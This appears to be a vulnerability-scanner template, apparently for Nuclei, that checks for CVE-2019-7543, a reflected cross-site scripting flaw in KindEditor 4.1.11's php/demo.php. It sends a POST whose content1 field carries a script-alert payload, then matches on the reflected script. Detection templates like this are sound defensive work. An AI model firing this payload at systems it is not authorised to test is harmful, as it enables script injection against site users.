34 lines
894 B
YAML
34 lines
894 B
YAML
|
id: CVE-2019-7543
|
||
|
|
||
|
info:
|
||
|
name: KindEditor 4.1.11, the php/demo.php - (XSS)
|
||
|
author: pikpikcu
|
||
|
severity: medium
|
||
|
description: KindEditor 4.1.11, the php/demo.php content1 parameter has a reflected Cross-site Scripting (XSS) vulnerability.
|
||
|
reference:
|
||
|
- https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7543
|
||
|
tags: cves,cve2019,kindeditor,xss
|
||
|
|
||
|
requests:
|
||
|
- method: POST
|
||
|
path:
|
||
|
- '{{BaseURL}/kindeditor/php/demo.php'
|
||
|
headers:
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
body: "content1=<script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- '<script>alert(document.domain)</script>'
|
||
|
part: body
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|